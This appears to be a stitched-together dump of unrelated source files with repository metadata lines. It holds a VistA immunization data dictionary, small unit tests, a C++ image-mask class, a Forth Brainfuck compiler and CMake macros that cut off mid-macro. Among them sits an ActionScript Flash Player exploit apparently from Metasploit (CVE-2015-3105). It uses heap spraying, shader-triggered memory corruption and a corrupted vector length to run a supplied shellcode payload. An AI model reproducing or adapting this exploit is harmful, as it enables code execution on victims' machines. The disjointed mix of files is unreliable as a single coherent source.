"^DD",9002084.95,9002084.95,0,"PT",9002084.118,.16)
"^DD",9002084.95,9002084.95,0,"PT",9999999.41,.17)
"^DD",9002084.95,9002084.95,0,"VRPK")
BI
"^DD",9002084.95,9002084.95,.01,0)
NDC CODE^RF^^0;1^K:$L(X)>14!($L(X)<10)!'(X'?1P.E) X
"^DD",9002084.95,9002084.95,.01,1,0)
^.1
"^DD",9002084.95,9002084.95,.01,1,1,0)
9002084.95^B
"^DD",9002084.95,9002084.95,.01,1,1,1)
S ^BINDC("B",$E(X,1,30),DA)=""
"^DD",9002084.95,9002084.95,.01,1,1,2)
K ^BINDC("B",$E(X,1,30),DA)
"^DD",9002084.95,9002084.95,.01,3)
Answer must contain 10 digits and 2 dashes.
"^DD",9002084.95,9002084.95,.01,"DT")
3140826
"^DD",9002084.95,9002084.95,.02,0)
VACCINE^RP9999999.14'^AUTTIMM(^0;2^Q
"^DD",9002084.95,9002084.95,.02,1,0)
^.1
"^DD",9002084.95,9002084.95,.02,1,1,0)
9002084.95^C
"^DD",9002084.95,9002084.95,.02,1,1,1)
S ^BINDC("C",$E(X,1,30),DA)=""
"^DD",9002084.95,9002084.95,.02,1,1,2)
K ^BINDC("C",$E(X,1,30),DA)
"^DD",9002084.95,9002084.95,.02,1,1,"DT")
3110726
"^DD",9002084.95,9002084.95,.02,3)
Select the vaccine associated with this NDC Code.
"^DD",9002084.95,9002084.95,.02,"DT")
3140825
"^DD",9002084.95,9002084.95,.03,0)
MANUFACTURER^P9999999.04'^AUTTIMAN(^0;3^Q
"^DD",9002084.95,9002084.95,.03,1,0)
^.1
"^DD",9002084.95,9002084.95,.03,1,1,0)
9002084.95^D
"^DD",9002084.95,9002084.95,.03,1,1,1)
S ^BINDC("D",$E(X,1,30),DA)=""
"^DD",9002084.95,9002084.95,.03,1,1,2)
K ^BINDC("D",$E(X,1,30),DA)
"^DD",9002084.95,9002084.95,.03,1,1,"DT")
3110729
"^DD",9002084.95,9002084.95,.03,"DT")
3140825
"^DD",9002084.95,9002084.95,.04,0)
PRODUCT NAME^F^^0;4^K:$L(X)>50!($L(X)<1) X
"^DD",9002084.95,9002084.95,.04,1,0)
^.1
"^DD",9002084.95,9002084.95,.04,1,1,0)
9002084.95^E
"^DD",9002084.95,9002084.95,.04,1,1,1)
S ^BINDC("E",$E(X,1,30),DA)=""
"^DD",9002084.95,9002084.95,.04,1,1,2)
K ^BINDC("E",$E(X,1,30),DA)
"^DD",9002084.95,9002084.95,.04,1,1,"DT")
3110729
"^DD",9002084.95,9002084.95,.04,3)
Answer must be 1-50 characters in length.
"^DD",9002084.95,9002084.95,.04,"DT")
3140825
"^DD",9002084.95,9002084.95,.05,0)
CVX CODE^CJ20^^ ; ^S Y(9002084.95,.05,1)=$S($D(^BINDC(D0,0)):^(0),1:"") S X=$P($G(^AUTTIMM(+$P(Y(9002084.95,.05,1),U,2),0)),U,3)
"^DD",9002084.95,9002084.95,.05,9.01)
9002084.95^.02
"^DD",9002084.95,9002084.95,.05,9.1)
VACCINE
"^DD",9002084.95,9002084.95,.05,"DT")
3110726
"^DD",9002084.95,9002084.95,.06,0)
STATUS^S^0:ACTIVE;1:INACTIVE;^0;6^Q
"^DD",9002084.95,9002084.95,.06,3)
Enter Active if this NDC Code should be available when recording the NDC Code of immunization visits. Enter Inactive if it should be no longer available.
"^DD",9002084.95,9002084.95,.06,"DT")
3110726
"^DD",9002084.97,9002084.97,0)
FIELD^^.05^5
"^DD",9002084.97,9002084.97,0,"DT")
3110723
"^DD",9002084.97,9002084.97,0,"ID",.02)
W " ",$P(^(0),U,2)
"^DD",9002084.97,9002084.97,0,"IX","B",9002084.97,.01)
"^DD",9002084.97,9002084.97,0,"IX","C",9002084.97,.02)
"^DD",9002084.97,9002084.97,0,"IX","D",9002084.97,.05)
"^DD",9002084.97,9002084.97,0,"NM","BI TABLE MANUFACTURERS")
"^DD",9002084.97,9002084.97,0,"VRPK")
BI
"^DD",9002084.97,9002084.97,.01,0)
NAME^RF^^0;1^K:$L(X)>30!($L(X)<3)!'(X'?1P.E) X
"^DD",9002084.97,9002084.97,.01,1,0)
^.1
"^DD",9002084.97,9002084.97,.01,1,1,0)
9002084.97^B
"^DD",9002084.97,9002084.97,.01,1,1,1)
S ^BIMAN("B",$E(X,1,30),DA)=""
"^DD",9002084.97,9002084.97,.01,1,1,2)
K ^BIMAN("B",$E(X,1,30),DA)
"^DD",9002084.97,9002084.97,.01,3)
Answer must be 3-30 characters in length.
"^DD",9002084.97,9002084.97,.01,"DT")
3031202
"^DD",9002084.97,9002084.97,.02,0)
MVX CODE^F^^0;2^K:$L(X)>3!($L(X)<2) X
"^DD",9002084.97,9002084.97,.02,1,0)
^.1
"^DD",9002084.97,9002084.97,.02,1,1,0)
9002084.97^C
"^DD",9002084.97,9002084.97,.02,1,1,1)
S ^BIMAN("C",$E(X,1,30),DA)=""
"^DD",9002084.97,9002084.97,.02,1,1,2)
K ^BIMAN("C",$E(X,1,30),DA)
"^DD",9002084.97,9002084.97,.02,1,1,"DT")
3031203
"^DD",9002084.97,9002084.97,.02,3)
Enter the MVX Code for this manufacturer. Answer must be 2-3 characters in length.
"^DD",9002084.97,9002084.97,.02,"DT")
3031203
"^DD",9002084.97,9002084.97,.03,0)
ACTIVE^S^0:INACTIVE;1:ACTIVE;^0;3^Q
"^DD",9002084.97,9002084.97,.03,3)
Enter ACTIVE for Manufacturers that can be selected for current Lot Numbers. Enter INACTIVE for manufactures that should no longer be selected for Lot Numbers.
"^DD",9002084.97,9002084.97,.03,"DT")
3031203
"^DD",9002084.97,9002084.97,.04,0)
FULL NAME^F^^0;4^K:$L(X)>150!($L(X)<3) X
"^DD",9002084.97,9002084.97,.04,3)
Enter the full name for this manufacturer. Answer must be 3-150 characters in length.
"^DD",9002084.97,9002084.97,.04,"DT")
3031203
"^DD",9002084.97,9002084.97,.05,0)
SYNONYM #1^F^^0;5^K:$L(X)>50!($L(X)<3) X
"^DD",9002084.97,9002084.97,.05,1,0)
^.1
"^DD",9002084.97,9002084.97,.05,1,1,0)
9002084.97^D
"^DD",9002084.97,9002084.97,.05,1,1,1)
S ^BIMAN("D",$E(X,1,30),DA)=""
"^DD",9002084.97,9002084.97,.05,1,1,2)
K ^BIMAN("D",$E(X,1,30),DA)
"^DD",9002084.97,9002084.97,.05,1,1,"DT")
3110723
"^DD",9002084.97,9002084.97,.05,3)
Answer must be 3-50 characters in length.
"^DD",9002084.97,9002084.97,.05,"DT")
3110723
"^DIC",9002084.118,9002084.118,0)
BI V IMMUNIZATIONS DELETED^9002084.118
"^DIC",9002084.118,9002084.118,0,"GL")
^BIVIMMD(
"^DIC",9002084.118,9002084.118,"%D",0)
^^13^13^2950901^^
"^DIC",9002084.118,9002084.118,"%D",1,0)
This file has been designed for joint use by the Indian Health Service and
"^DIC",9002084.118,9002084.118,"%D",2,0)
the Department of Veteran Affairs.
"^DIC",9002084.118,9002084.118,"%D",3,0)
"^DIC",9002084.118,9002084.118,"%D",4,0)
This file contains immunizations specific to a particular visit for a
"^DIC",9002084.118,9002084.118,"%D",5,0)
particular patient. This file contains one record for each immunization.
"^DIC",9002084.118,9002084.118,"%D",6,0)
"^DIC",9002084.118,9002084.118,"%D",7,0)
In the VA, if a CPT code is entered into PCE that represents an
"^DIC",9002084.118,9002084.118,"%D",8,0)
immunization, than an immunization will automatically be entered in the V
"^DIC",9002084.118,9002084.118,"%D",9,0)
Immunization file. And vice versa, if an immunization is entered into PCE
"^DIC",9002084.118,9002084.118,"%D",10,0)
that has a related CPT code, then a V CPT entry will automatically be
"^DIC",9002084.118,9002084.118,"%D",11,0)
created with the CPT code for the immunization. The PCE Code Mapping file
"^DIC",9002084.118,9002084.118,"%D",12,0)
contains the definitions of what immunization is related to what CPT code,
"^DIC",9002084.118,9002084.118,"%D",13,0)
and vice versa.
"^DIC",9002084.118,"B","BI V IMMUNIZATIONS DELETED",9002084.118)
"^DIC",9002084.61,9002084.61,0)
BI USER SELECTIONS^9002084.61
"^DIC",9002084.61,9002084.61,0,"GL")
^BISELECT(
"^DIC",9002084.61,"B","BI USER SELECTIONS",9002084.61)
"^DIC",9002084.62,9002084.62,0)
BI USER DATE-LOC LINE^9002084.62
"^DIC",9002084.62,9002084.62,0,"GL")
^BIDLOC(
"^DIC",9002084.62,"B","BI USER DATE-LOC LINE",9002084.62)
"^DIC",9002084.63,9002084.63,0)
BI USER AGE RANGE^9002084.63
"^DIC",9002084.63,9002084.63,0,"GL")
^BIAGRG(
"^DIC",9002084.63,"B","BI USER AGE RANGE",9002084.63)
"^DIC",9002084.7,9002084.7,0)
BI PACKAGE INFORMATION^9002084.7
"^DIC",9002084.7,9002084.7,0,"GL")
^BINFO(
"^DIC",9002084.7,"B","BI PACKAGE INFORMATION",9002084.7)
"^DIC",9002084.8,9002084.8,0)
BI TABLE REACTION^9002084.8
"^DIC",9002084.8,9002084.8,0,"GL")
^BIREC(
"^DIC",9002084.8,"B","BI TABLE REACTION",9002084.8)
"^DIC",9002084.82,9002084.82,0)
BI TABLE ADD INFO ITEMS^9002084.82
"^DIC",9002084.82,9002084.82,0,"GL")
^BIADDIN(
"^DIC",9002084.82,"B","BI TABLE ADD INFO ITEMS",9002084.82)
"^DIC",9002084.83,9002084.83,0)
BI TABLE ELIGIBILITY CODES^9002084.83
"^DIC",9002084.83,9002084.83,0,"GL")
^BIELIG(
"^DIC",9002084.83,"B","BI TABLE ELIGIBILITY CODES",9002084.83)
"^DIC",9002084.94,9002084.94,0)
BI IMMUNIZATION TABLE HL7/CVX STANDARD^9002084.94
"^DIC",9002084.94,9002084.94,0,"GL")
^BITN(
"^DIC",9002084.94,"B","BI IMMUNIZATION TABLE HL7/CVX STANDARD",9002084.94)
"^DIC",9002084.95,9002084.95,0)
BI TABLE NDC CODES^9002084.95
"^DIC",9002084.95,9002084.95,0,"GL")
^BINDC(
"^DIC",9002084.95,"B","BI TABLE NDC CODES",9002084.95)
"^DIC",9002084.97,9002084.97,0)
BI TABLE MANUFACTURERS^9002084.97
"^DIC",9002084.97,9002084.97,0,"GL")
^BIMAN(
"^DIC",9002084.97,"B","BI TABLE MANUFACTURERS",9002084.97)
**END**
**END**
| Genshi | 2 | mdgeek/VistA-FHIR-CWF | Scripts/Install/CWF/kid/28-BIV_SUPPLEMENT-1.0.kid | [
"Apache-2.0"
] |
using Uno;
using Uno.Testing;
using Fuse.Charting;
using FuseTest;
namespace Fuse.Test
{
public class LayoutTest: TestBase
{
[Test]
public void Enums()
{
Assert.AreEqual( 0, (int)PlotAxisLayoutAxis.X );
Assert.AreEqual( 1, (int)PlotAxisLayoutAxis.Y );
}
}
} | Uno | 4 | helilabs/fuselibs | Source/Fuse.Charting/Tests/Layout.Test.uno | [
"MIT"
] |
package com.baeldung.apache.curator;
import org.apache.curator.RetryPolicy;
import org.apache.curator.framework.CuratorFramework;
import org.apache.curator.framework.CuratorFrameworkFactory;
import org.apache.curator.retry.RetryNTimes;
import org.junit.Before;
public abstract class BaseManualTest {
@Before
public void setup() {
org.apache.log4j.BasicConfigurator.configure();
}
protected CuratorFramework newClient() {
int sleepMsBetweenRetries = 100;
int maxRetries = 3;
RetryPolicy retryPolicy = new RetryNTimes(maxRetries, sleepMsBetweenRetries);
return CuratorFrameworkFactory.newClient("127.0.0.1:2181", retryPolicy);
}
}
| Java | 4 | zeesh49/tutorials | apache-curator/src/test/java/com/baeldung/apache/curator/BaseManualTest.java | [
"MIT"
] |
--TEST--
Test that mixed is a reserved class name
--FILE--
<?php
class mixed
{
}
?>
--EXPECTF--
Fatal error: Cannot use 'mixed' as class name as it is reserved in %s on line %d
| PHP | 4 | NathanFreeman/php-src | Zend/tests/type_declarations/mixed/syntax/mixed_class_error.phpt | [
"PHP-3.01"
] |
/*
* Copyright (c) 2021, Davipb <[email protected]>
*
* SPDX-License-Identifier: BSD-2-Clause
*/
#include "Mask.h"
namespace PixelPaint {
Mask::Mask(Gfx::IntRect bounding_rect, u8 default_value)
: m_bounding_rect(bounding_rect)
{
auto data_size = bounding_rect.size().area();
m_data.resize(data_size);
for (auto& x : m_data) {
x = default_value;
}
}
Mask Mask::with_bounding_rect(Gfx::IntRect inner_rect) const
{
auto result = Mask::empty(inner_rect);
result.for_each_pixel([&](int x, int y) {
result.set(x, y, get(x, y));
});
return result;
}
void Mask::shrink_to_fit()
{
int topmost = NumericLimits<int>::max();
int bottommost = NumericLimits<int>::min();
int leftmost = NumericLimits<int>::max();
int rightmost = NumericLimits<int>::min();
bool empty = true;
for_each_pixel([&](auto x, auto y) {
if (get(x, y) == 0) {
return;
}
empty = false;
topmost = min(topmost, y);
bottommost = max(bottommost, y);
leftmost = min(leftmost, x);
rightmost = max(rightmost, x);
});
if (empty) {
m_bounding_rect = {};
m_data.clear();
return;
}
Gfx::IntRect new_bounding_rect(
leftmost,
topmost,
rightmost - leftmost + 1,
bottommost - topmost + 1);
*this = with_bounding_rect(new_bounding_rect);
}
void Mask::invert()
{
for_each_pixel([&](int x, int y) {
set(x, y, 0xFF - get(x, y));
});
}
void Mask::add(Mask const& other)
{
combine(other, [](int a, int b) { return a + b; });
}
void Mask::subtract(Mask const& other)
{
combine(other, [](int a, int b) { return a - b; });
}
void Mask::intersect(Mask const& other)
{
combinef(other, [](float a, float b) { return a * b; });
}
}
| C++ | 4 | r00ster91/serenity | Userland/Applications/PixelPaint/Mask.cpp | [
"BSD-2-Clause"
] |
// @target: es5
// @declaration: true
interface I {
["" + ""](): void;
} | TypeScript | 1 | nilamjadhav/TypeScript | tests/cases/conformance/es6/computedProperties/computedPropertyNamesDeclarationEmit3_ES5.ts | [
"Apache-2.0"
] |
( ==================== Brain Fuck Compiler =================== )
( The following brain fuck compiler is based on one available here
http://rosettacode.org/wiki/Execute_Brain****/Forth. It has been
adapted to work with libforth. The license for this program is
GNU Free Documentation License, [v1.2], as it is derived from
the program on there.
Brain F*ck is a simple language with only 8 commands, a description
from Wikipedia [https://en.wikipedia.org/wiki/Brainfuck]:
"The language consists of eight commands, listed below. A brainfuck
program is a sequence of these commands, possibly interspersed with other
characters [which are ignored]. The commands are executed sequentially,
with some exceptions: an instruction pointer begins at the first command,
and each command it points to is executed, after which it normally moves
forward to the next command. The program terminates when the instruction
pointer moves past the last command.
The brainfuck language uses a simple machine model consisting of the
program and instruction pointer, as well as an array of at least 30,000
byte cells initialized to zero; a movable data pointer [initialized
to point to the leftmost byte of the array]; and two streams of bytes
for input and output [most often connected to a keyboard and a monitor
respectively, and using the ASCII character encoding].
> increment the data pointer [to point to the next cell to the
right].
< decrement the data pointer [to point to the next cell to the
left].
+ increment the byte at the data pointer.
- decrement the byte at the data pointer.
. output the byte at the data pointer.
, accept one byte of input, storing its value in the byte at
the data pointer.
[ if the byte at the data pointer is zero, then instead of
moving the instruction pointer forward to the next command,
jump it forward to the command after the matching ] command.
] if the byte at the data pointer is nonzero, then instead of
moving the instruction pointer forward to the next command,
jump it back to the command after the matching [ command."
This implementation only provides a minimum of 2048 cells [on a 16-bit
computer], this should be sufficient for most programs.
The word 'bf' takes a [non-transient] string to a brain f*ck program and
parser a word from input, creating a new word and compiling the string
into the new word.
The compiled world can be executed like any other Forth word. As an example,
the following program brain f*ck program implements an echo program:
c" +[,.]" bf echo
Which can be run by typing in 'echo'.
Whilst this is a toy program it does elucidate how a compiler from one
language to another can be created in Forth.
)
1024 constant bf-len
: init ( -- c-addr u : initialize the transient region BF executes from )
here bf-len erase chere 0 ;
: check ( c-addr : check that the data pointer is within bounds )
chere bf-len chars> bounds swap within 0= if -1 throw then ;
: right ( c-addr u -- c-addr+1 u : move the data pointer right one BF cell )
over c! 1+ dup dup check c@ ;
: left ( c-addr u -- c-addr-1 u : move the data pointer left one BF cell )
over c! 1- dup dup check c@ ;
: bf-compile ( char -- : compile a single brain f*ck command )
case
[char] [ of postpone begin
['] dup ,
postpone while endof
[char] ] of postpone repeat endof
[char] + of ['] 1+ , endof
[char] - of ['] 1- , endof
[char] < of ['] left , endof
[char] > of ['] right , endof
[char] , of ['] drop , ['] key , endof
[char] . of ['] dup , ['] emit , endof
\ [char] ; of postpone ; endof
endcase ;
: (bf) c@ bf-compile ;
: bf ( c-addr u c" xxx" -- create a new word that executes a brain f*ck program )
::
['] init ,
['] (bf) foreach
['] swap , ( swap pointer and current cell value )
['] c! , ( write it back )
(;) ;
hide{ bf-len bf-compile init check right left (bf) }hide
( An example creates a Forth word called 'hello' that prints "Hello, World!"
c" ++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]>>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++." bf hello
hello )
( ==================== Brain Fuck Compiler =================== )
| Forth | 5 | andrewtholt/libforth | fth/bf.fth | [
"MIT"
] |
package
{
import flash.display.Shader
import flash.display.Sprite
import flash.display.LoaderInfo
import mx.utils.Base64Decoder
import flash.utils.ByteArray
import flash.geom.Point
import flash.utils.Endian
public class Exploit extends Sprite
{
private var uv:Vector.<uint>
private var canvas:Sprite
private var filler_shader:Shader
private var transformation_shader:Shader
private var top_middle:Point
private var bottom_left:Point
private var bottom_right:Point
private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray
private var platform:String
private var os:String
private var exploiter:Exploiter
[Embed ( source="test_bin.pbj", mimeType="application/octet-stream" ) ]
private static var FillerPbj:Class
[Embed ( source="pbsrc_bin.pbj", mimeType="application/octet-stream" ) ]
private static var TransformationPbj:Class
private var uint_vectors_length:uint = 70000
private var ba_vector_length:uint = 5000
private var ba_length:int = 0x2000
private var uint_vectors:Vector.<Object>
private var ba_vector:Vector.<Object>
public function Exploit()
{
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
os = LoaderInfo(this.root.loaderInfo).parameters.os
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray()
canvas = new Sprite()
addChild(canvas)
var size:uint = 400
top_middle = new Point(size / 2, 10)
bottom_left = new Point(0, size - 10)
bottom_right = new Point(size, size - 10)
do_exploit()
}
private function do_exploit():void
{
setup_shaders()
apply_shader_to_exploit()
}
private function setup_shaders():void
{
transformation_shader = new Shader(new TransformationPbj())
ba_vector = new Vector.<Object>(ba_vector_length)
uint_vectors = new Vector.<Object>(uint_vectors_length)
// Initialize uint vectors
for(var i:uint = 0; i < uint_vectors_length; i++) // 70000
{
uint_vectors[i] = new Vector.<uint>()
}
// Allocate Byte Arrays
for(i = 0; i < ba_vector_length; i++) // 5000
{
ba_vector[i] = new ByteArray()
ba_vector[i].endian = "littleEndian"
ba_vector[i].length = ba_length // 0x2000
fill_byte_array(ba_vector[i], 0x35555555)
ba_vector[i].writeInt(0xbabefac0)
ba_vector[i].writeInt(0xbabefac1)
ba_vector[i].writeInt(i)
ba_vector[i].writeInt(0xbabefac3)
}
// Make holes
for(i = 5000 / 3; i < ba_vector_length; i = i + 3) // 5000
{
fill_byte_array(ba_vector[i], 0x37777777)
ba_vector[i].clear()
ba_vector[i] = null
}
// Setup shader
filler_shader = new Shader(new FillerPbj()) //test_bin.pbj
filler_shader.data.point1.value = [top_middle.x, top_middle.y]
filler_shader.data.point2.value = [bottom_left.x, bottom_left.y]
filler_shader.data.point3.value = [bottom_right.x, bottom_right.y]
}
final private function fill_byte_array(ba:ByteArray, value:int):void
{
ba.position = 0
var i:uint = 0
while (i < ba.length / 4)
{
ba.writeInt(value)
i = i + 1
}
ba.position = 0
return
}
private function apply_shader_to_exploit():void
{
try {
filler_shader.data.point3 = transformation_shader.data.positionTransformation27
} catch(err:Error) {
Logger.log("Error!")
}
filler_shader.data.color1.value = [1, 1, 1, 1]
// Trigger corruption with the hope of modify one of the sprayed byte arrays
canvas.graphics.clear()
canvas.graphics.beginShaderFill(filler_shader)
canvas.graphics.moveTo(top_middle.x, top_middle.y)
canvas.graphics.lineTo(bottom_left.x, bottom_left.y)
canvas.graphics.lineTo(bottom_right.x, bottom_right.y)
canvas.graphics.endFill()
// Search the BA whose data has been corrupted
var test:uint
var mod_idx:uint = 0xffffffff
for(var i:uint = 0; i< ba_vector_length; i++) { // 5000
if (ba_vector[i] != null) {
ba_vector[i].position = 32
test = ba_vector[i].readUnsignedInt()
if (test != 0x35555555) {
mod_idx = i
break
}
}
}
if (mod_idx == 0xffffffff) {
Logger.log("[*] Exploit - apply_shader_to_exploit(): Modified ba not found... aborting")
return
}
// Clear the modified BA, we need a hole there =)
fill_byte_array(ba_vector[mod_idx], 0x39999999)
ba_vector[mod_idx].clear()
ba_vector[mod_idx] = null
// Fill the BA space with well positioned Vector.<uint>'s, hopefully...
for(i = 0; i < uint_vectors_length; i++) // 70000
{
uint_vectors[i].length = 0x13e
uint_vectors[i][0] = 0xcccccccc
uint_vectors[i][1] = i
uint_vectors[i][2] = 0xaaaaaaaa
}
// Corrupt again, hopefully one of our vector lengths =)
canvas.graphics.beginShaderFill(filler_shader)
var corrupted:uint = 0xffffffff
for(i = 0; i < uint_vectors_length; i++) // 70000
{
if (uint_vectors[i].length != 0x13e) {
corrupted = i
break
}
}
if (corrupted == 0xffffffff) {
Logger.log("[*] Exploit - apply_shader_to_exploit(): Corrupted vector not found... aborting")
return
}
var offset:uint = 0xffffffff
for(i = 0; i < 2048; i++)
{
if (uint_vectors[corrupted][i] == 0x13e && uint_vectors[corrupted][i+2] == 0xcccccccc)
{
uint_vectors[corrupted][i] = 0xffffffff
offset = i
break
}
}
if (offset == 0xffffffff) {
Logger.log("[*] Exploit - apply_shader_to_exploit(): Vector for manual corruption not found... aborting")
return
}
for(i = 0; i < uint_vectors_length; i++) // 70000
{
if (uint_vectors[i].length == 0xffffffff) {
uv = uint_vectors[i]
break
}
}
if (uv == null) {
Logger.log("[*] Exploit - apply_shader_to_exploit(): Vector manually corrupted not found... aborting")
return
}
var my_offset:uint = 0x3ffffffe - offset - 2
uv[my_offset] = 0x13e
for(i = 0; i < ba_vector_length; i++) { // 5000
if (ba_vector[i] != null) {
ba_vector[i].clear()
ba_vector[i] = null
}
}
for(i = 0; i < uint_vectors_length; i++) // 70000
{
if (uint_vectors[i].length != 0xffffffff) {
delete(uint_vectors[i])
uint_vectors[i] = null
}
}
exploiter = new Exploiter(this, platform, os, payload, uv, 0x13e)
}
}
}
| ActionScript | 4 | OsmanDere/metasploit-framework | external/source/exploits/CVE-2015-3105/Exploit.as | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
# Generated from: catkin_simple/cmake/catkin_simple-extras.cmake.em
if(_CATKIN_SIMPLE_EXTRAS_INCLUDED_)
return()
endif()
set(_CATKIN_SIMPLE_EXTRAS_INCLUDED_ TRUE)
include(CMakeParseArguments)
@[if DEVELSPACE]@
# cmake dir in develspace
set(catkin_simple_CMAKE_DIR "@(CMAKE_CURRENT_SOURCE_DIR)/cmake")
@[else]@
# cmake dir in installspace
set(catkin_simple_CMAKE_DIR "@(PKG_CMAKE_DIR)")
@[end if]@
macro(catkin_simple)
# Arguments
# ALL_DEPS_REQUIRED -- Add the "REQUIRED" flag when calling
# FIND_PACKAGE() for each dependency
cmake_parse_arguments(cs_args "ALL_DEPS_REQUIRED" "" "" ${ARGN})
if(TARGET ${PROJECT_NAME}_package)
message(WARNING "Could not create target '${${PROJECT_NAME}_package}' for project ${PROJECT_NAME}, as it already exists.")
endif()
add_custom_target(${PROJECT_NAME}_package)
set(${PROJECT_NAME}_TARGETS)
set(${PROJECT_NAME}_LIBRARIES)
find_package(catkin REQUIRED)
# call catkin_package_xml() if it has not been called before
if(NOT _CATKIN_CURRENT_PACKAGE)
catkin_package_xml()
endif()
set(${PROJECT_NAME}_CATKIN_BUILD_DEPENDS)
set(${PROJECT_NAME}_CATKIN_BUILD_DEPENDS_EXPORTED_TARGETS)
foreach(dep ${${PROJECT_NAME}_BUILD_DEPENDS})
# If this flag is defined, add the "REQUIRED" flag
# to all FIND_PACKAGE calls
if(cs_args_ALL_DEPS_REQUIRED)
find_package(${dep} REQUIRED)
else()
find_package(${dep} QUIET)
endif()
if(${dep}_FOUND_CATKIN_PROJECT)
list(APPEND ${PROJECT_NAME}_CATKIN_BUILD_DEPENDS ${dep})
list(APPEND ${PROJECT_NAME}_CATKIN_BUILD_DEPENDS_EXPORTED_TARGETS ${${dep}_EXPORTED_TARGETS})
endif()
endforeach()
# Let find_package(catkin ...) do the heavy lifting
find_package(catkin REQUIRED COMPONENTS ${${PROJECT_NAME}_CATKIN_BUILD_DEPENDS})
# add include directory if available
set(${PROJECT_NAME}_LOCAL_INCLUDE_DIR ${CMAKE_CURRENT_SOURCE_DIR}/include)
if(NOT IS_DIRECTORY ${${PROJECT_NAME}_LOCAL_INCLUDE_DIR})
set(${PROJECT_NAME}_LOCAL_INCLUDE_DIR)
endif()
include_directories(${${PROJECT_NAME}_LOCAL_INCLUDE_DIR} ${catkin_INCLUDE_DIRS})
# perform action/msg/srv generation if necessary
if(message_generation_FOUND_CATKIN_PROJECT)
set(${PROJECT_NAME}_DO_MESSAGE_GENERATION FALSE)
# add action files if available
set(${PROJECT_NAME}_LOCAL_ACTION_DIR ${CMAKE_CURRENT_SOURCE_DIR}/action)
if(NOT IS_DIRECTORY ${${PROJECT_NAME}_LOCAL_ACTION_DIR})
set(${PROJECT_NAME}_LOCAL_ACTION_DIR)
endif()
if(${PROJECT_NAME}_LOCAL_ACTION_DIR)
add_action_files(DIRECTORY action)
set(${PROJECT_NAME}_DO_MESSAGE_GENERATION TRUE)
endif()
# add message files if available
set(${PROJECT_NAME}_LOCAL_MSG_DIR ${CMAKE_CURRENT_SOURCE_DIR}/msg)
if(NOT IS_DIRECTORY ${${PROJECT_NAME}_LOCAL_MSG_DIR})
set(${PROJECT_NAME}_LOCAL_MSG_DIR)
endif()
if(${PROJECT_NAME}_LOCAL_MSG_DIR)
add_message_files(DIRECTORY msg)
set(${PROJECT_NAME}_DO_MESSAGE_GENERATION TRUE)
endif()
# add service files if available
set(${PROJECT_NAME}_LOCAL_SRV_DIR ${CMAKE_CURRENT_SOURCE_DIR}/srv)
if(NOT IS_DIRECTORY ${${PROJECT_NAME}_LOCAL_SRV_DIR})
set(${PROJECT_NAME}_LOCAL_SRV_DIR)
endif()
if(${PROJECT_NAME}_LOCAL_SRV_DIR)
add_service_files(DIRECTORY srv)
set(${PROJECT_NAME}_DO_MESSAGE_GENERATION TRUE)
endif()
# generate messages if necessary
if(${PROJECT_NAME}_DO_MESSAGE_GENERATION)
# identify all build dependencies which contain messages
set(${PROJECT_NAME}_MSG_PACKAGES)
foreach(dep ${${PROJECT_NAME}_CATKIN_BUILD_DEPENDS})
set(${PROJECT_NAME}_MSG_PACKAGE_FILE ${${dep}_DIR}/${dep}-msg-paths.cmake)
if(EXISTS ${${PROJECT_NAME}_MSG_PACKAGE_FILE})
list(APPEND ${PROJECT_NAME}_MSG_PACKAGES ${dep})
endif()
endforeach()
generate_messages(DEPENDENCIES ${${PROJECT_NAME}_MSG_PACKAGES})
# add additional exported targets coming from generate_messages()
list(INSERT ${PROJECT_NAME}_CATKIN_BUILD_DEPENDS_EXPORTED_TARGETS 0 ${${PROJECT_NAME}_EXPORTED_TARGETS})
endif()
endif()
# generate dynamic reconfigure files
if(dynamic_reconfigure_FOUND_CATKIN_PROJECT)
set(${PROJECT_NAME}_LOCAL_CFG_DIR ${CMAKE_CURRENT_SOURCE_DIR}/cfg)
if(IS_DIRECTORY ${${PROJECT_NAME}_LOCAL_CFG_DIR})
# create a list containing all the cfg files
file(GLOB ${PROJECT_NAME}_LOCAL_CFG_FILES RELATIVE "${CMAKE_CURRENT_SOURCE_DIR}" "${${PROJECT_NAME}_LOCAL_CFG_DIR}/*.cfg")
if(${PROJECT_NAME}_LOCAL_CFG_FILES)
generate_dynamic_reconfigure_options(${${PROJECT_NAME}_LOCAL_CFG_FILES})
# add build dep on gencfg
list(APPEND ${PROJECT_NAME}_CATKIN_BUILD_DEPENDS_EXPORTED_TARGETS ${PROJECT_NAME}_gencfg)
endif()
endif()
endif()
endmacro()
macro(cs_add_targets_to_package)
add_dependencies(${PROJECT_NAME}_package ${ARGN})
list(APPEND ${PROJECT_NAME}_TARGETS ${ARGN})
endmacro()
macro(cs_add_executable _target)
if(${_target} STREQUAL ${PROJECT_NAME}_package)
message(WARNING "Could not create executable with name '${_target}' as '${PROJECT_NAME}_package' is reserved for the top level target name for this project.")
endif()
cmake_parse_arguments(cs_add_executable_args "NO_AUTO_LINK;NO_AUTO_DEP" "" "" ${ARGN})
add_executable(${_target} ${cs_add_executable_args_UNPARSED_ARGUMENTS})
if(NOT cs_add_executable_args_NO_AUTO_LINK)
target_link_libraries(${_target} ${catkin_LIBRARIES})
endif()
if(NOT cs_add_executable_args_NO_AUTO_DEP)
if(NOT "${${PROJECT_NAME}_CATKIN_BUILD_DEPENDS_EXPORTED_TARGETS}" STREQUAL "")
add_dependencies(${_target} ${${PROJECT_NAME}_CATKIN_BUILD_DEPENDS_EXPORTED_TARGETS})
endif()
endif()
cs_add_targets_to_package(${_target})
endmacro()
macro(cs_add_library _target)
if(${_target} STREQUAL ${PROJECT_NAME}_package)
message(WARNING "Could not create library with name '${_target}' as '${PROJECT_NAME}_package' is reserved for the top level target name for this project.")
endif()
cmake_parse_arguments(cs_add_library "NO_AUTO_LINK;NO_AUTO_DEP;NO_AUTO_EXPORT" "" "" ${ARGN})
add_library(${_target} ${cs_add_library_UNPARSED_ARGUMENTS})
if(NOT cs_add_library_NO_AUTO_LINK)
target_link_libraries(${_target} ${catkin_LIBRARIES})
endif()
if(NOT cs_add_library_NO_AUTO_DEP)
if(NOT "${${PROJECT_NAME}_CATKIN_BUILD_DEPENDS_EXPORTED_TARGETS}" STREQUAL "")
